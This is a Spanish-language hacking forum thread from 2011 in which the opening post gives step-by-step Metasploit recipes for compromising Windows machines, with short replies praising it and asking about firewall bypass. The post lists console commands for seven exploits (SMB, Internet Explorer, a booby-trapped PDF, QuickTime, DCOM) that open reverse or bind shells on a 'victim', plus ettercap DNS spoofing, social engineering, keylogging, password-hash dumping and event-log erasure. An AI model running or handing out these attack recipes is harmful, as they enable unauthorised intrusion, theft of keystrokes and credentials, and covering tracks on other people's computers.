Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
Cargando

Autor Tema: Ejemplos de distintos exploits  (Leído 16050 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Conectado JAG

  • Co-Administrador.
  • ***
  • Topic Author
  • Mensajes: 1562
    • Ver Perfil
    • joseag.com.ar
Ejemplos de distintos exploits
« en: Agosto 18, 2011, 04:19:44 pm »
Hola!!
Os traigo un post con ejemplos de como se utilizarían algunos exploits de Metasploit para explotar vulnerabilidades de Windows.
Quizás os parecerán poca cosa ya que me estoy iniciando en esto y quiero que este post sirva para seguir aprendiendo de este tema y aporten sus conocimientos.
Empezar diciendo que Metasploit Framework se puede utilizar tanto en linux como en windows. Yo utilizo backtrack ya que lo incluye, además de otras herramientas que pueden combinarse con Metasploit.

Link de descarga: http://www.metasploit.com/download/

Antes de lanzar cualquier exploit es recomendable que conozcamos las ip's conectadas a nuestra red, para ello:

linux:
Código: [Seleccionar]
sudo nmap -sS -O 192.168.1.0-255
-sS --> Escaneamos de forma silenciosa
-O  --> Para que nos muestre el Sistema Operativo

Windows:
Código: [Seleccionar]
net view

Aparte de esto aconsejo también el uso de la herramienta Colasoft MAC Scanner para el escaneo de pc's conectadas a la red.

Ejecutamos el msfconsole de Metasploit Framework.

Una vez que conocemos las ip's y sus respectivos Sistemas Operativos, para utilizar el primer exploits vamos a intentar localizar algún Windows XP
(Recomendable que para ver si el pc está conectado hagamos ping a su ip)

*Primer exploit (netapi)
Código: [Seleccionar]
use windows/smb/ms08_067_netapi
set RHOST (ip equipo remoto)
set payload windows/vncinject/reverse_tcp
set LHOST (ip equipo nuestro)
exploit
Se nos abrirá una pantalla remota con el pc víctima.

Como hemos visto el anterior solo sirve para Windows XP, veamos ahora uno que se puede utilizar en cualquier Sistema Windows aprovechando una vulnerabilidad en Internet Explorer (como es natural, la víctima debe utilizar como navegador el Internet Explorer).

*Segundo exploit
Código: [Seleccionar]
use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST mi_ip
set LPORT 4442
exploit
/*Saldrá una URL en la que la víctima debe entrar, esperamos a que entre*/
sessions -i 1
run vnc

Se nos abrirá una pantalla remota con el pc víctima.

*Tercer exploit (Parecido al anterior)
Código: [Seleccionar]
use exploit/windows/browser/ms11_003_ie_css_import
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST mi_ip
exploit
/*Saldrá una URL en la que la víctima debe entrar, esperamos a que entre*/
sessions -i 1
run vnc

Se nos abrirá una pantalla remota con el pc víctima.

Supongamos que no tenemos posibilidad de pasarle la URL al pc víctima, para ello podemos utilizar ettercap de la siguiente manera:
Código: [Seleccionar]
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /(ip victima)/ //
de esta forma cuando se abra el explorer irá a dicha URL directamente. Para ello debemos modificar antes el archivo etter.dns. Para ello procedemos de la siguiente manera:
Código: [Seleccionar]
sudo gedit /usr/share/ettercap/etter.dns
Buscamos la siguiente linea:
Código: [Seleccionar]
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
Y agregamos lo siguiente:
Código: [Seleccionar]
* A nuestra_ip
El * para que cuando entre a cualquier URL se redireccione a la URL Infectada.

*Cuarto exploit (a través de pdf)
Código: [Seleccionar]
use exploit/windows/fileformat/adobe_pdf_embedded_exe
set FILENAME archivo.pdf (archivo que vamos a crear, ponemos el nombre que queramos)
set INFILENAME archivo.pdf (archivo limpio, le pasamos el nombre de nuestro pdf)
set OUTPUTPATH /root/
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (mi ip)
set LPORT 4455
set id 0
exploit
clear
back
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (mi ip)
set LPORT 4455
set id 0
exploit
/*Le pasamos el pdf a la víctima y al abrirlo nos dará entrada a su pc*/

*Quinto exploit (vulnerabilidad de Quicktime)
Código: [Seleccionar]
use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que vamos a utilizar)
set SRVHOST 192.168.0.162 (IP local donde va a montar el servicio)
set SRVPORT 80 (Puerto local del servicio)
set URIPATH juegos (Uri del servicio)
set payload windows/shell/reverse_tcp (Payload que vamos a utilizar)
set LHOST 192.168.0.162 (IP donde se conectará la víctima)
set LPORT 5050 (Puerto local de escucha)
exploit (Ejecutamos el exploit)

Solo faltaría que nuestra víctima se conectase a nuestro servidor (192.168.0.162/juegos), consiguiendo esto usando algo de ingeniería social, para que Metasploit nos informe de que se ha creado una nueva sesión. Usamos el siguiente comando (sessions -i x) donde x es el número de sesión creado para conectar con la víctima y se nos devuelva una shell reversa de la misma. De esta manera conseguiremos control total sobre su pc. Este método sirve para todas las versiones de Windows que tengan instalado Quicktime.

*Sexto exploit (keylogger)
Código: [Seleccionar]
use windows/smb/ms08_067_netapi
set RHOST (ip equipo remoto)
set PAYLOAD windows/meterpreter/bind_tcp
exploit
/*Una vez lanzado el exploit y ya estando dentro del pc v?ctima veamos los procesos que tiene corriendo*/
ps
/*Ahora migraremos al proceso explorer.exe. Usando el comando siguiente: */
migrate (nº del proceso).
/*Iniciemos el Keylogger*/
keyscan_start
/*Con la ayuda del comando keyscan_dump, veremos las teclas presionadas en el equipo víctima*/
keyscan_dump
/*También tenemos la posibilidad de ver un ScreenShot de la pantalla víctima*/
use espia
screenshot /Imag.bmp
/*Finalizamos el keylogger*/
keyscan_stop

*Séptimo exploit (Intrusión en Windows Server 2000)
Código: [Seleccionar]
search exploit ms03_026_dcom
use exploit /windows/dcerpc/ms03_026_dcom
show targets
show payloads
set payload generic/shell_bind_tcp
show options
set RHOST [IP de la víctima]
exploit

Una vez explotado el sistema podemos hacer muchas cosas, he aquí un listado de comandos que podemos  utilizar:

background -> Envia al segundo plano la sesion activa.
exit -> Termina la sesion abierta de Meterpreter
help -> Muestra la ayuda     
irb -> Nos lanza al interprete de Ruby (irb).         
migrate -> Migra de un proceso a otro     
quit -> Termina la sesion abierta de Meterpreter
run ->  Ejecuta un script de Meterpreter. Presionando dos veces TAB veremos los disponibles.       
use -> Carga una o mas extension de Meterpreter. Presionando dos veces TAB veremos los disponibles.     
cat ->  Muestra el contenido de un archivo de texto.     
cd ->  Cambia a un directorio   
del -> Elimina un archivo especifico     
download -> Descarga un archivo o directorio al equipo local     
editc -> Edita un archivo
getlwd -> Muestra el directorio local en el que estamos trabajando     
getwd -> Muestra el directorio remoto en el que estamos trabajando
lcd ->  Cambia a un directorio local
lpwd ->  Muestra el directorio local en el que estamos trabajando     
ls ->  Muestra los archivos contenidos en un directorio   
mkdir ->  Crea un directorio       
pwd -> Muestra el derectorio remoto en el que estamos trabajando   
rm -> Elimina un archivo especifico 
rmdir ->  Elimina un directorio especifico     
upload -> Sube un archivo o directorio al equipo remoto     
ipconfig -> Muestra las interfaces de red
clearev -> Elimina los logs almacenados en la aplicacion “Visor de Sucesos”
execute -> Ejecuta un comando   
getpid -> Muestra la identificacion del proceso en el que estamos
getuid ->  Muestra el usuario en el que estamos actualmente 
kill -> Termina un proceso
ps -> Muestra los procesos en ejecucion       
reboot ->  Reinicia el equipo remoto     
reg ->  Modifica e interactua con el registro remoto
shell ->  Nos lanza a una consola en el equipo remoto   
shutdown ->  Apaga el equipo remoto 
sysinfo -> Nos muestra informacion sobre el equipo remoto
keyscan_dump ->  Muestra las pulsaciones de teclas grabadas
keyscan_start  -> Empieza a capturar pulsaciones de teclas
keyscan_stop  -> Detiene la captura de pulsaciones de teclas
hashdump -> Muestra el contenido de la SAM (Contiene los usuarios y passwords encriptadas)

Bueno esto es lo poco que se sobre este tema de metasploit y quisiera seguir aprendiendo, espero haberlos entretenido y acepto críticas, hagan sus aportes para seguir aprendiendo!!
Saludos!!

De vez en cuando reviso esta página para aprender un poco más sobre este amplio tema. Os la recomiendo   http://www.metasploit.com/modules/

P.D: Muchas gracias a Sasuke por hacer sus aportaciones. Estoy seguro de que si seguimos aportando aprenderemos mucho más entre todos.
« última modificación: Marzo 29, 2012, 03:31:10 pm por jag6613 »
"No se puede pactar con las dificultades, o las vencemos o nos vencen"
http://joseag.com.ar

Lavacaloca

  • Visitante
Re:Ejemplos de distintos exploits
« Respuesta #1 en: Agosto 20, 2011, 01:34:37 am »
Muy bueno. Pero más bien es para "saborear" esto de los exploits, ya que es muy breve , pero eso también esta bueno para meterte en el mundillo de los exploits y  para ver que cosas sos capas de hacer , para luego profundizar sobre el tema :)

Una pregunta, ¿solo funcionan con máquinas que esten en red??

Gracias por el aporte :D

Conectado JAG

  • Co-Administrador.
  • ***
  • Topic Author
  • Mensajes: 1562
    • Ver Perfil
    • joseag.com.ar
Re:Ejemplos de distintos exploits
« Respuesta #2 en: Agosto 20, 2011, 07:07:23 pm »
Gracias Lavacaloca!!
Son 4 exploits que yo utilicé más algunos comandos que he utilizado en algún momento, eso si, siempre lo hice con computadoras en red...Como ya digo en el post quiero seguir aprendiendo de este tema así que seguiré informándome y si aportan sus conocimientos sobre el tema mucho mejor!!   :)
Espero haber ayudado o iniciado a alguien en esto del metasploit!!
Saludos!!
"No se puede pactar con las dificultades, o las vencemos o nos vencen"
http://joseag.com.ar

Desconectado LeoN

  • Éste es mi foro! [L6]
  • *****
  • Mensajes: 805
  • El conocimiento humano pertenece al mundo...
    • Ver Perfil
    • LeoN
Re:Ejemplos de distintos exploits
« Respuesta #3 en: Agosto 22, 2011, 08:33:31 pm »
Buen aporte, gracias por la info.
A probar...



Saludos.!
- Quiero cambiar el mundo... ¿Alguien me recomienda un buen Desensamblador?
- Para seguir la trayectoria: mira al maestro, sigue al maestro, camina junto al maestro, mira a través del maestro, conviértete en el maestro...

Desconectado ancie

  • Éste es mi foro! [L6]
  • *****
  • Mensajes: 577
  • Atacando tu mundo obsceno y mejorandolo.
    • Ver Perfil
Re:Ejemplos de distintos exploits
« Respuesta #4 en: Agosto 25, 2011, 08:29:35 am »
Buen aporte checando  :o :o :o
salu2.  8)

Desconectado Sasuke

  • Parte de la comunidad [L3]
  • ***
  • Mensajes: 177
    • Ver Perfil
Re:Ejemplos de distintos exploits
« Respuesta #5 en: Octubre 04, 2011, 03:30:05 pm »
Muy bueno,el tutorial yo también probe algunos con vmware pero tenia que tener el firewall desactivado no sabras algún tipo de tecnica para poder saltarlo,yo lei algo acerca de bypass firewall pero no se como funciona o podrias lanazar algun exploits al firewal (creo que acabo de decir una burrada XD)

De todas formas el tutorial está muy bien =)
Nunca consideres el estudio como una obligación, sino como una oportunidad para penetrar en el bello y maravilloso mundo del saber.
-Albert Einstein

Conectado JAG

  • Co-Administrador.
  • ***
  • Topic Author
  • Mensajes: 1562
    • Ver Perfil
    • joseag.com.ar
Re:Ejemplos de distintos exploits
« Respuesta #6 en: Octubre 04, 2011, 03:43:56 pm »
jajajajaja eso último no se si se podrá hacer...en todo caso conseguir saltárselo o desactivarlo...
Un firewall lo que hace es permitir pasar el tráfico que se quiera y denegar el resto, supongo que escaneando con el nmap deberíamos encontrar algún puerto abierto (que no lo cierre el firewall) y a partir de ahí atacar con un exploit diseñado para ese puerto...pero no probé nada. Tengo que ponerme con esto que dices a ver si consigo algo lo que pasa que ahora estoy liado con la universidad.
De todas formas échale un vistazo a esta página http://www.metasploit.com/modules/. Viene mucha info de módulos del metasploit, quizás haya alguno para lo que tu buscas. Siento no poder ayudarte mucho... Saludos!!

PD: a ver si hay alguna mente lúcida que nos ilumine y nos diga por donde tirar.  ;D
"No se puede pactar con las dificultades, o las vencemos o nos vencen"
http://joseag.com.ar

Desconectado Sasuke

  • Parte de la comunidad [L3]
  • ***
  • Mensajes: 177
    • Ver Perfil
Re:Ejemplos de distintos exploits
« Respuesta #7 en: Octubre 04, 2011, 03:48:58 pm »
Bueno voy a buscar un poco,hoy no porque tengo un examen el jueves  :'( .El viernes me pongo ,no te preocupes por lo de la univarsidad,porque lo entiendo y los estudios son lo primero,además ya tengo winxp en un maquina y otra con backtrack y voy a probar algunas cosas como dejar ciertos puertos o bueno lo que se me ocurra ;D
Nunca consideres el estudio como una obligación, sino como una oportunidad para penetrar en el bello y maravilloso mundo del saber.
-Albert Einstein

Desconectado Jen

  • Residente de Hack x Crack [L4]
  • ****
  • Mensajes: 457
  • |Mi unico crimen es la curiosidad|
    • Ver Perfil
Re:Ejemplos de distintos exploits
« Respuesta #8 en: Octubre 04, 2011, 03:50:18 pm »
Muy bueno, felicidades.
Una pregunta, metasploit solo sirve cuando estas en lan? O quizas hay otros ataques, por ip por ejemplo y asi?
~ Auditorías en el espacio awi!!

Desconectado overload

  • EX-STAFF
  • ***
  • Mensajes: 1218
    • Ver Perfil
Re:Ejemplos de distintos exploits
« Respuesta #9 en: Octubre 04, 2011, 03:55:59 pm »
Muy buen aporte amigo.Te felicito ;)
En cuanto a la pregunta de arriba:
Una pregunta, metasploit solo sirve cuando estas en lan? O quizas hay otros ataques, por ip por ejemplo y asi?
Se la dejo al autor jaja para eso el post es suyo :P

Un saludo.